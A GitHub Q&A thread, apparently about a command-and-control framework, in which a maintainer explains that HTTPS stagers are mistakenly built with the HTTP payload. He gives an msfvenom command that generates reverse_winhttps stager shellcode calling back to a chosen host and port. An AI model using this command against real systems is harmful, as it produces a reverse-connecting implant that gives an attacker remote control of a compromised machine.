Skip to content

HTTPS Stager Requesting with HTTP Protocol - No Call Back #917

Answered by rkervella
An00bRektn asked this question in Q&A
Discussion options

You must be logged in to vote

It's a bug, we're using custom/reverse_winhttp in generate stager for both HTTP and HTTPS. We should use custom/reverse_winhttps for HTTPS. I'll fix it.

@An00bRektn in the meantime, you can use msfvenom to generate the stager shellcode using the following payload: windows/x64/custom/reverse_winhttps. Make sure to have the LURI ending in .woff (or whatever you set un the c2 config file):

msfvenom -p windows/x64/custom/reverse_winhttps LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff -f raw -o /tmp/stager.bin

Replies: 2 comments 3 replies

Comment options

You must be logged in to vote
1 reply
@An00bRektn
Comment options

Comment options

You must be logged in to vote
2 replies
@moloch--
Comment options

@ColeVan
Comment options

Answer selected by An00bRektn
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Category
Q&A
Labels
None yet
4 participants